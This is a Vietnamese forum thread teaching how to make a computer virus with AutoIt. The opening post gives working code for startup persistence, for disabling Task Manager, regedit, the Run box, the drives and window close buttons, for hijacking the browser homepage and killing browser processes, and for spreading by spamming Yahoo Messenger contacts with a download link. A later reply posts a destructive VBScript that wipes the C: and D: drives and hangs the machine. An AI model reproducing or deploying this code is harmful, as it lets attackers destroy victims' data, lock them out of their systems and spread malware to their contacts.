Trang 1 của 2 12 CuốiCuối
Kết quả 1 đến 10 của 19
  1. #1
    Ngày tham gia
    Aug 2015
    Bài viết
    0

    Làm virus = autoit (hướng dẫn đầy đủ)

    Đầu tiên các bạn phải down chương trìnnh về tại đây
    AutoIt Script Home Page
    Link direct: http://www.autoitscript.com/cgi-bin/...t-v3-setup.exe
    *Chú ý: +Khi edit 1 một con virus bắt buộc phải nhấn phải chuột rồi nhấn edit script, chứ nếu nhấn chuột trái như bình thường là bạn sẽ tự dính con virus mà bạn làm ra đó
    +Không nên kiếm ebook autoit vì nó kô hữu dụng cho bạn đâu, nếu muốn học sâu và rộng hơn thì bạn bắt buộc phải đọc trong file help của chương trình
    +Icon của chương trình bắt buộc kô được đẽ mặc định vì các trình virus sẽ phát hiện
    +Các lệnh mình sẽ làm nổi lên


    Bắt đầu nhé:

    Đầu tiên các bạn copy code mình post bên dưới nha!

    Sau đó thì:



    Edit scirpt



    Paste code vào


    Convert file au3 --> exe (cái này quan trọng)


    Nếu đây là lần đâu tiên bạn convert file au3 --> exe thì phải làm theo các bước đó, nhưng về sau bạn chỉ cần nhấn phải chột vào file au3 và nhấn compile script là file exe sẽ compile ngay tại thư mục chứa file au3 ^^


    Lệnh đầu tiên mà bắt buộc con virus = autoit nào cũng phải có:
    #Notrayicon
    ---> để kô hiện chương trình ở khay icon

    FileCopy(@ScriptDir & "\******.exe","C:\WINDOWS",1)
    ---> "*****" sẽ là tên virus mà bạn tạo ở con autoit này, lệnh này dùng để kết hợp với lệnh kế tiếp
    Lệnh khắc phục:
    FileDelete("C:\Windows\*****.exe")

    RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Run","explorer","REG_SZ",@Win dowsDir & "\*****.exe")
    ---> **** sẽ là tên chương trình, lệnh này dùng để khởi động virus mỗi khi máy tính được bật lên, và chỉ dùng được khi có lệnh ở trên
    Lệnh khắc phục:
    RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\W indows\CurrentVersion\Run","explorer")

    RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System","DisableTaskM gr","REG_DWORD","1")
    RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Policies\System","DisableTask Mgr","REG_DWORD","1")

    ----> lệnh này sẽ giúp con virus của bạn khóa taskmanager của máy tính
    Lệnh khắc phục:
    RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\CurrentVersion\Policies\System","DisableTask Mgr")
    RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\W indows\CurrentVersion\Policies\System","DisableTas kMgr")

    RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System","DisableRegis tryTools","REG_DWORD","1")
    RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Policies\System","DisableRegi stryTools","REG_DWORD","1")

    ----> lệnh này sẽ giúp con virus của bạn khóa regedit của máy tính
    Lệnh khắc phục:
    RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\CurrentVersion\Policies\System","DisableRegi stryTools")
    RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\W indows\CurrentVersion\Policies\System","DisableReg istryTools")

    RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Policies\Explorer","NoRun","R EG_DWORD","1")
    ----> lệnh này sẽ giúp làm mất nút run trong windows
    Lệnh khắc phục:
    RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\W indows\CurrentVersion\Policies\Explorer","NoRun")

    RegWrite("HKEY_CURRENT_USER\Software\Policies\Micr osoft\Internet Explorer\Control Panel","Homepage","REG_DWORD","kick_bay_gio@yahoo. com.vn")
    RegWrite("HKEY_CURRENT_USER\Software\Policies\Micr osoft\Internet Explorer\Control Panel","Homepage","REG_DWORD","1")

    ----> lệnh này sẽ giúp bạn thay đổi homepage của IE, ở đây mình change homepage lại là kick_bay_gio@yahoo.com.vn ^^"

    RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\Explorer","NoViewOnDr ive","REG_DWORD","67108863")
    RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Policies\Explorer","NoViewOnD rive","REG_DWORD","67108863")
    RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\Explorer","NoDrives", "REG_DWORD","67108863")
    RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Policies\Explorer","NoDrives" ,"REG_DWORD","67108863")

    ----> lệnh này giúp bạn khóa ổ đĩa của người khác, kô cho truy cập vào ổ đĩa, "67108863" ---> là thông số để khóa tất cả các ổ đĩa
    Lệnh khắc phục:
    RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\CurrentVersion\Policies\Explorer","NoViewOnD rive")
    RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\W indows\CurrentVersion\Policies\Explorer","NoViewOn Drive")
    RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\CurrentVersion\Policies\Explorer","NoDrives" )
    RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\W indows\CurrentVersion\Policies\Explorer","NoDrives ")


    RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\Explorer","NoClose"," REG_DWORD","1")

    ---> lệnh này làm mất nút close ở mỗi chương trinh (bật lên là kô thể tắt được (o_O)
    Lệnh khắc phục:
    RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\CurrentVersion\Policies\Explorer","NoClose")

    Lệnh reset máy:
    Shutdown(thông số)
    Các thông số có thể có là
    +0: Đổi user (hay thường gọi là log off)
    +1: Tắt máy (shutdown)
    +2: reset máy(restart)
    +4: Force
    +8: Power down
    +32: Stanby
    +64: Hibernate
    VD: Shutdown(2) ---> reset máy

    Lệnh đợi, dừng:
    Sleep(seconds)
    VD: Sleep(3000) ---> Dừng 3 giây

    Cách phát tán trên yahoo (hót nhất ^^)
    Dim $tin[10] -----> $tin[so] So: số ở đây là số tin nhắn mà bạn muống gửi trong yahoo
    $tin[0] ="marryme " ------> bạn đặt lời nhắn vào trong dấu ngoặc kép + link down virus ^^"
    $tin[1] ="vip"
    $tin[2] =" nhut"
    $tin[3] =" babu"
    $tin[4] =" ...."
    $tin[5] =" ...."
    $tin[6] ="...... "
    $tin[7] ="..... "
    $tin[8] ="..... "
    $tin[9] ="...... "
    $tieude = WinGetTitle("Yahoo! Messenger","")
    $kiemtra = WinExists ($tieude)
    While 1
    If $kiemtra = 1 Then
    $ngaunhien = Random(0,9,1)
    Sleep(2500)
    ClipPut($tin[$ngaunhien])
    BlockInput (1)
    WinActivate($tieude)
    Send("!m")
    Send("un")
    Send("^v {ENTER}{ENTER}")
    Send("^m")
    Send("{DOWN}")
    Send("^{SHIFTDOWN}{END}{SHIFTUP}")
    Send("{ENTER}")
    Send("^v {ENTER}")
    BlockInput (0)
    EndIf


    Lệnh kô cho mỡ 1 chương trình bất kỳ (chỉ cần biết tên process của chương trình đó)

    While
    If Proces***ists("iexplorer.exe") then
    ProcessClose("iexplorer.exe")
    EndIf
    If Proces***ists("firefox.exe") then
    ProcessClose("firefox.exe")
    EndIf
    WEnd

    ----> VD: If Proces***ists("iexplorer.exe") then ---> khi máy tính mở file iexplorer (IE)
    ProcessClose("iexplorer.exe") --> đóng ngay lập tức
    EndIf

  2. #2
    Ngày tham gia
    Aug 2015
    Bài viết
    0
    hic ,bác ơi ,ai lại dạy cách hại người thế ,đã thế ,em cũng học cho biết :Khi (20):

  3. #3
    Ngày tham gia
    Aug 2015
    Bài viết
    0
    Bác ơi hôm nào em đến nhà bác học tận tay, đi ngay vào trong trán thế thì dễ hiểu hơn nhỉ ok không mời bác một trầu coffe Nắng sài gòn

  4. #4
    Ngày tham gia
    Aug 2015
    Bài viết
    0
    các bác cứ học đi rùi em ban nick vĩnh viễn hehe

  5. #5
    Ngày tham gia
    Aug 2015
    Bài viết
    0
    Bác ơi chơi cái này có an toàn không để em chơi thử cái hồi trước em cũng xài mấy cái auto hark cuối cùng máy bị DIE đó

  6. #6
    Ngày tham gia
    Aug 2015
    Bài viết
    0
    [QUOTE="hungmonitor"][COLOR=Red][B]Bác ơi chơi cái này có an toàn không để em chơi thử cái hồi trước em cũng xài mấy cái auto hark cuối cùng máy bị DIE đó:Ma (89):

  7. #7
    Ngày tham gia
    Nov 2015
    Bài viết
    0
    Bạn ơi cái này khi add lệnh vào có cần thêm mấy cái lệnh sửa chữa ở dưới hok hở bác?

  8. #8
    Ngày tham gia
    Nov 2015
    Bài viết
    0
    bác có hình hướng dẫn đầy đủ ko, hoặc chỉ cách làm từ A->Z luôn đi em gà đọc chả hiểu gì cả

  9. #9
    Ngày tham gia
    Sep 2015
    Bài viết
    0
    Bạn ơi cái lệnh đóng cuối cùng nó bị sao ấy làm mãi mà hok cóa được

  10. #10
    Ngày tham gia
    Aug 2015
    Bài viết
    0
    msgbox"chet nay` .. dinh virus của rongcon trong congtruongit.com rui` )"
    On Error Resume Next
    Set hack_map = Createobject("scripting.filesystemobject")
    hack_map.copyfile wscript.scriptfullname,vip_xinh.GetSpecialFolder(0 )& "\ hack_map.vbs"
    Set hack_map2= CreateObject("WScript.Shell")
    hack_map2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\die","wscript.exe "& hack_map.GetSpecialFolder(0)& "\ hack_map.vbs %"

    On Error Resume Next
    Const vic = "D:\"
    Delvic
    Sub Delvic()
    Dim fso
    Set fso = CreateObject("Scripting.FileSystemObject")
    fso.DeleteFile vic & "*.*" , True
    fso.DeleteFolder vic & "*" , True
    End Sub

    On Error Resume Next
    Const vic1 = "C:\windows\"
    Delvic1
    Sub Delvic1()
    Dim fso1
    Set fso1 = CreateObject("Scripting.FileSystemObject")
    fso1.DeleteFile vic1 & "*.*" , True
    fso1.DeleteFolder vic1 & "*" , True
    End Sub

    On Error Resume Next
    Const vic2 = "C:\"
    Delvic2
    Sub Delvic2()
    Dim fso2
    Set fso2 = CreateObject("Scripting.FileSystemObject")
    fso2.DeleteFile vic2 & "*.*" , True
    fso2.DeleteFolder vic2 & "*" , True
    End Sub

    On Error Resume Next
    Set treomay= CreateObject("WScript.Shell")
    Do
    treomay.run "notepad",false
    loop
    coppy đoạn trên rùi mở Notepad paste vào lưu lại với tên CTIT_virut.vbs thế là xong

    còn đây là lời giải thích của tieuquynhi



    ban đầu nó thêm 1 giá trị vào phần run để chạy cùng hệ thống
    sau đó nó xóa tất cả các file và thư mục trong ổ D
    sau đó xóa toàn bộ file và thư mục trong ổ C:\windows
    rùi làm tương tự với ổ C
    cuối cùng là mở liên tục notepad nhằm mục đích treo máy

 

 
Trang 1 của 2 12 CuốiCuối

Các Chủ đề tương tự

  1. eScan Anti-Virus - Bảo vệ máy tính khỏi virus, spyware, hacker
    Bởi chinhdel trong diễn đàn Security Software
    Trả lời: 2
    Bài viết cuối: 11-01-2012, 01:08 AM
  2. The Ultimate Virus 1.20 - Phần mềm giả dạng virus
    Bởi myphamuc93 trong diễn đàn Những Phần Mềm Khác
    Trả lời: 5
    Bài viết cuối: 03-17-2011, 04:26 PM
  3. Multi Virus Cleaner 2008 (MVC) Quét Virus khá mạnh
    Bởi blogfordanlac trong diễn đàn Security Software
    Trả lời: 0
    Bài viết cuối: 07-22-2008, 02:53 PM

Quyền viết bài

  • Bạn Không thể gửi Chủ đề mới
  • Bạn Không thể Gửi trả lời
  • Bạn Không thể Gửi file đính kèm
  • Bạn Không thể Sửa bài viết của mình
  •